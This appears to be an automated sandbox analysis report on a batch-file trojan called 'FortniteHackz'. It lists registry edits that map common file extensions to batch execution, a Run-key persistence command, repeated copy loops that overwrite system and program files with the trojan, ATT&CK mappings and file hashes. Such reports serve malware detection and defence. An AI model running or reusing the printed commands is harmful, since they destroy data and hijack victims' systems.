File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-d..view-host-appxsetup_31bf3856ad364e35_10.0.22000.1_none_9d9bcf1a21cc1e7a\appxblockmap.xml	cmd.exe

Modifies registry class 18 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.doc\ = "batfile"	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.pdf	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.pdf\ = "batfile"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.txt\ = "batfile"	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mp3	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.exe	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mp4	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.doc	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.lnk	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.png	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.lnk\ = "batfile"	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.txt	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.exe\ = "batfile"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mp4\ = "batfile"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.xml\ = "batfile"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mp3\ = "batfile"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.png\ = "batfile"	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.xml	cmd.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 5060 wrote to memory of 2168	5060	cmd.exe	79
PID 5060 wrote to memory of 2168	5060	cmd.exe	79
PID 5060 wrote to memory of 1444	5060	cmd.exe	81
PID 5060 wrote to memory of 1444	5060	cmd.exe	81
PID 5060 wrote to memory of 1532	5060	cmd.exe	82
PID 5060 wrote to memory of 1532	5060	cmd.exe	82
PID 5060 wrote to memory of 2256	5060	cmd.exe	84
PID 5060 wrote to memory of 2256	5060	cmd.exe	84
PID 5060 wrote to memory of 4884	5060	cmd.exe	85
PID 5060 wrote to memory of 4884	5060	cmd.exe	85
PID 5060 wrote to memory of 3628	5060	cmd.exe	86
PID 5060 wrote to memory of 3628	5060	cmd.exe	86
PID 5060 wrote to memory of 4004	5060	cmd.exe	87
PID 5060 wrote to memory of 4004	5060	cmd.exe	87
PID 5060 wrote to memory of 3124	5060	cmd.exe	88
PID 5060 wrote to memory of 3124	5060	cmd.exe	88
PID 5060 wrote to memory of 4468	5060	cmd.exe	89
PID 5060 wrote to memory of 4468	5060	cmd.exe	89
PID 5060 wrote to memory of 5020	5060	cmd.exe	91
PID 5060 wrote to memory of 5020	5060	cmd.exe	91
PID 5060 wrote to memory of 3840	5060	cmd.exe	92
PID 5060 wrote to memory of 3840	5060	cmd.exe	92
PID 5060 wrote to memory of 1380	5060	cmd.exe	93
PID 5060 wrote to memory of 1380	5060	cmd.exe	93
PID 5060 wrote to memory of 4936	5060	cmd.exe	94
PID 5060 wrote to memory of 4936	5060	cmd.exe	94
PID 5060 wrote to memory of 416	5060	cmd.exe	96
PID 5060 wrote to memory of 416	5060	cmd.exe	96
PID 5060 wrote to memory of 3188	5060	cmd.exe	97
PID 5060 wrote to memory of 3188	5060	cmd.exe	97
PID 5060 wrote to memory of 1592	5060	cmd.exe	98
PID 5060 wrote to memory of 1592	5060	cmd.exe	98
PID 5060 wrote to memory of 2792	5060	cmd.exe	99
PID 5060 wrote to memory of 2792	5060	cmd.exe	99
PID 5060 wrote to memory of 5012	5060	cmd.exe	102
PID 5060 wrote to memory of 5012	5060	cmd.exe	102
PID 5060 wrote to memory of 2392	5060	cmd.exe	103
PID 5060 wrote to memory of 2392	5060	cmd.exe	103
PID 5060 wrote to memory of 4784	5060	cmd.exe	105
PID 5060 wrote to memory of 4784	5060	cmd.exe	105
PID 5060 wrote to memory of 3984	5060	cmd.exe	106
PID 5060 wrote to memory of 3984	5060	cmd.exe	106
PID 5060 wrote to memory of 3568	5060	cmd.exe	108
PID 5060 wrote to memory of 3568	5060	cmd.exe	108
PID 5060 wrote to memory of 2368	5060	cmd.exe	109
PID 5060 wrote to memory of 2368	5060	cmd.exe	109
PID 5060 wrote to memory of 1364	5060	cmd.exe	111
PID 5060 wrote to memory of 1364	5060	cmd.exe	111
PID 5060 wrote to memory of 2788	5060	cmd.exe	112
PID 5060 wrote to memory of 2788	5060	cmd.exe	112
PID 5060 wrote to memory of 3716	5060	cmd.exe	114
PID 5060 wrote to memory of 3716	5060	cmd.exe	114
PID 5060 wrote to memory of 3160	5060	cmd.exe	115
PID 5060 wrote to memory of 3160	5060	cmd.exe	115
PID 5060 wrote to memory of 1140	5060	cmd.exe	117
PID 5060 wrote to memory of 1140	5060	cmd.exe	117
PID 5060 wrote to memory of 3904	5060	cmd.exe	118
PID 5060 wrote to memory of 3904	5060	cmd.exe	118
PID 5060 wrote to memory of 2252	5060	cmd.exe	120
PID 5060 wrote to memory of 2252	5060	cmd.exe	120
PID 5060 wrote to memory of 3176	5060	cmd.exe	121
PID 5060 wrote to memory of 3176	5060	cmd.exe	121
PID 5060 wrote to memory of 2148	5060	cmd.exe	123
PID 5060 wrote to memory of 2148	5060	cmd.exe	123

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat"
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:5060
- C:\Windows\system32\reg.exe
  reg add "hklm\Software\Microsoft\Windows\CurrentVersion\Run" /v "rundll32_89_toolbar" /t "REG_SZ" /d C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat /f
  2⤵
  - Adds Run key to start application
  PID:2168
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y "
  2⤵
  PID:1444
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_doc.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
  2⤵
  PID:1532
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y "
  2⤵
  PID:2256
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_lnk.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
  2⤵
  PID:4884
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y "
  2⤵
  PID:3628
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_pdf.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
  2⤵
  PID:4004
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y "
  2⤵
  PID:3124
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_txt.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
  2⤵
  - Drops file in Drivers directory
  - Drops file in System32 directory
  - Drops file in Program Files directory
  PID:4468
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y "
  2⤵
  PID:5020
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp3.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
  2⤵
  PID:3840
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y "
  2⤵
  PID:1380
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_exe.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
  2⤵
  - Drops file in System32 directory
  - Drops file in Program Files directory
  - Drops file in Windows directory
  PID:4936
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y "
  2⤵
  PID:416
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp4.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
  2⤵
  PID:3188
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y "
  2⤵
  PID:1592
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_png.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
  2⤵
  - Drops file in System32 directory
  - Drops file in Program Files directory
  - Drops file in Windows directory
  PID:2792
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y "
  2⤵
  PID:5012
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_xml.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
  2⤵
  - Drops file in System32 directory
  - Drops file in Program Files directory
  - Drops file in Windows directory
  PID:2392
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y "
  2⤵
  PID:4784
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_xml.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
  2⤵
  - Drops file in System32 directory
  - Drops file in Program Files directory
  - Drops file in Windows directory
  PID:3984
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y "
  2⤵
  PID:3568
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_xml.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
  2⤵
  - Drops file in System32 directory
  - Drops file in Program Files directory
  - Drops file in Windows directory
  PID:2368
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y "
  2⤵
  PID:1364
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_xml.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
  2⤵
  - Drops file in System32 directory
  - Drops file in Program Files directory
  - Drops file in Windows directory
  PID:2788
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y "
  2⤵
  PID:3716
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_xml.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
  2⤵
  - Drops file in System32 directory
  - Drops file in Windows directory
  PID:3160
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y "
  2⤵
  PID:1140
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_xml.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
  2⤵
  - Drops file in Program Files directory
  - Drops file in Windows directory
  PID:3904
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y "
  2⤵
  PID:2252
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_xml.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
  2⤵
  - Drops file in System32 directory
  - Drops file in Program Files directory
  - Drops file in Windows directory
  PID:3176
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y "
  2⤵
  PID:2148
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_xml.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
  2⤵
  - Drops file in Program Files directory
  - Drops file in Windows directory
  PID:572
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y "
  2⤵
  PID:3576
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_xml.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
  2⤵
  - Drops file in System32 directory
  - Drops file in Program Files directory
  - Drops file in Windows directory
  PID:1944
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y "
  2⤵
  PID:4516
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_xml.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
  2⤵
  PID:3400
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y "
  2⤵
  PID:3160
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_xml.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
  2⤵
  PID:2340
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y "
  2⤵
  PID:948
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_.pp.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
  2⤵
  PID:1600
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y "
  2⤵
  PID:1336
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_.dll.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
  2⤵
  PID:4808
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y "
  2⤵
  PID:4568
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_.sys.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
  2⤵
  PID:4416
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y "
  2⤵
  PID:3496
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_.vbs.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
  2⤵
  PID:2244
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y "
  2⤵
  PID:1972
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_.rar.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
  2⤵
  PID:1760
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y "
  2⤵
  PID:1648
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_.jar.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
  2⤵
  PID:3100
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y "
  2⤵
  PID:112
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_.virus.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
  2⤵
  PID:3872
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y "
  2⤵
  PID:1744
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_.vir.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
  2⤵
  PID:3572
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y "
  2⤵
  PID:4852
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_.iso.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
  2⤵
  PID:1764
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y "
  2⤵
  PID:5008
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_.bat.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
  2⤵
  PID:2924

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Marquee.xml

Filesize
34KB

MD5
4a812cb3bddc8bd1d63252fb8c483b9b

SHA1
7afeabf10ba2994cd8a69cd6ce0d574e9c78d797

SHA256
7deab1b703f5b0a5276ebc7b6c6431754f48608b514af206a2d235bf873a585a

SHA512
8917df6652689e936a55082fe8ace70c415c482a3ece37890c54933ec351e355152ec234fcace948003455ac05c987933f8882cd0e925efb6a602160529d6cc1

Download Submit
C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\InfList_doc.txt

Filesize
937B

MD5
0aa44cda93a001e3159c95b4f5d5e481

SHA1
f92aa6e99d17c2681a8d19f5d7d99cfa4f9dd23b

SHA256
219d9382397806c8ba684e355bdc92f32c4ddcaa06bd8a91cfac3df3b7df1275

SHA512
43f9d6e116f2f556b1911b359b2b1e981ab63affbb0355b42bc87003ef2944f5407caad34d33410f0a03eb4edaa20a9ef6eac2180a84647cd2954744cef5530b

Download Submit
C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\InfList_exe.txt

Filesize
428KB

MD5
48d30ed7e4f2085bfc976067e1216fd6

SHA1
b76740cb115f7a7ee0428346bcc68b4ba1c6f3fc

SHA256
98ba345b2a6e0274360b29588f06879e21f0aafe193e5132b25316fcfdee3aa6

SHA512
f70874aa074f8458d7e6f26f676a6b86e0f5a8f236ad43bdd4ec6b9f95ce4258961b294a90b1add55323bdf037e46e63fa9f53da11f662e1f1eb17ba6bc1af89

Download Submit
C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\InfList_lnk.txt

Filesize
37KB

MD5
3216f011f742e4a27a3f2d00a01502b7

SHA1
844fff5affdb273b62e7e03ae5de837f1d4b6cdf

SHA256
c338125f2d669907338d01dfbb172dddc843bec3aa0f5bbd516a7acd2474eb61

SHA512
f70fc26909f5669d7c97710939012bda47ba0668ff20d8f9a00cd8d80666d69d5c8b2000e455305923e8d7a4aaebec354273e09839339d09e0b242e00cba7960

Download Submit
C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\InfList_mp4.txt

Filesize
968B

MD5
16b179bfca89bcf8ee6156f9f8119657

SHA1
9abee27342e2fd0ce4527fa840b8e330a269cb24

SHA256
4ee95f94e19146f63a2b5cd27a107dfc7ad4ca24ca153adbe98c8a63e3d58b30

SHA512
c37b7e216101c64e87386ffdb3a2e5347d9e6cf351463ef9d9959da3b923da27b8667e64128408bd71552735b056de1bc2573c0161fd9c8292910eecfd61b6e8

Download Submit
C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\InfList_pdf.txt

Filesize
2KB

MD5
ee8b51f59d8ef1b91e315bac9d1b8d80

SHA1
18c805d970b45639ef60db255b3cde69f280b7c8

SHA256
392b2cdf03763ff1f019968355fa8788f76857acf06ba97e27d0ebdb95577c1f

SHA512
bc35d12a82419b8a43efac43f3a6667dc342777e75603ec210806fab410eaa51a79cfa4a3164865ff316db9627065339dcd1c79f1596546584b2f6227c0330bd

Download Submit
C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\InfList_png.txt

Filesize
2.1MB

MD5
fe25d5d8429e83a4c20ca537313ac762

SHA1
9175934190797d7d4b36c15a3fa0f7783dadd0c4

SHA256
bb795eca8aec1b04df712f5705b2071b168de3bfe75cdd4192d57727d473aa1a

SHA512
76300d7b071b8b2fba75532c25065b7f145d0da38cf47f2321d708593ba24fe288eef30c0f5032b4dea93ade5367339381c410bf954d2704e7b3a81254845dd5

Download Submit
C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\InfList_txt.txt

Filesize
35KB

MD5
734cdd6fad466403b9e3d7af644aace4

SHA1
05c33a2fd9e803395c26229ccd7b19849cb5dbfc

SHA256
74962d776aebabd82a91d76918b8a36582ec08a15d308c7595d64f01db116178

SHA512
ba8794f56f6dafe09b8062011995676720c85341d31776478e883a8a59373ca15a3b8f833dee461152aa9db3772d9eb6803b1c55c0f92370682ab2c5e2a8e158

Download Submit
C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\InfList_xml.txt

Filesize
1.6MB

MD5
c3ad0fbac6e57eda6b6f6762c81657ad

SHA1
c63641d27b0df01f61941518bbb78f254d70487c

SHA256
0d8ea0701f679f95eb4db6992f9b97c5b38b8037d24aa9593e1db4424333a127

SHA512
abe8d0a90e99b21d50d6363fee23a3b677887f2e0b3a259ca3ee128fc46d017d243f03cf161d5a90979b6081f483fdf22148270f5c31f21ef59a2e46239e3023

Download Submit
C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\InfList_xml.txt

Filesize
328KB

MD5
26b85df6fe0e1c7bcf6b2a80f425801e

SHA1
ebe663a41f6897cb6f05ed5b50f6b375a4c4646e

SHA256
07c0fcc8822dd914cba92ab41ab3dee6ea88299a64c198f72d24838b33337b62

SHA512
56e3032d0e1af70914bb2bec9ff5d17d4ea47cf3a87d881d05d115cb0ca680f3c52a95ddfa5bf2ba7e9d166ba53940ded0d57a7a168b8a2f1e1a7e457150e525

Download Submit
C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\InfList_xml.txt

Filesize
657KB

MD5
aa41bb94c1891d08c0195e9169b7a201

SHA1
5e32ba2b3b7e62ece80ae57590c219de9326a578

SHA256
eedc12e8c72f1e1787ef0368b1e76eda34422db28521ab8cbb60a7846873cb3c

SHA512
f778e3b13605ab1a7a9d7f5f8d188d1fdc9bfd6e4f8731463dd997d8f64a5b4d5757399a68b3f65fe324520b2d43c5991d5eb0d67633a31f7596ce22afd88acc

Download Submit
C:\Users\Admin\Desktop\ConvertFromSubmit.docm

Filesize
34KB

MD5
ac04b6f6fa293c4b55c4c8b49372a9ec

SHA1
9dfca519218c3c10203163454f1237916b0655cc

SHA256
273f4b1732968174b95b549e1fec0b61181404b820a0d8f1b8dec9c32686bd92

SHA512
b560feee161c2300b3145026dd5faa0ca3b4edbcaa88a8d68854d26b0c1a6087370af5da707b2fb61c5ca0b363a5786f5e7eeba2ed1fe5ae863347f018889086

Download Submit
C:\mail.vbs

Filesize
626B

MD5
faf26be18051cb2a6b9f494709d6f64f

SHA1
ddaaa2342fa04be74cc81e4a4206274d7a9e8d77

SHA256
cae83c07da4e807331b117e25f122c460234aec3598c7b7739d12de76f3445ff

SHA512
d19eac8ed2f1f353fe3dfa9113542be8e2593f3f17be17cfa90dbfab164125f05d7f59e89afd5680ad7044d1e867b130567c934e7132ac79eda79eaafd7ef272

Download Submit

Resubmissions

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads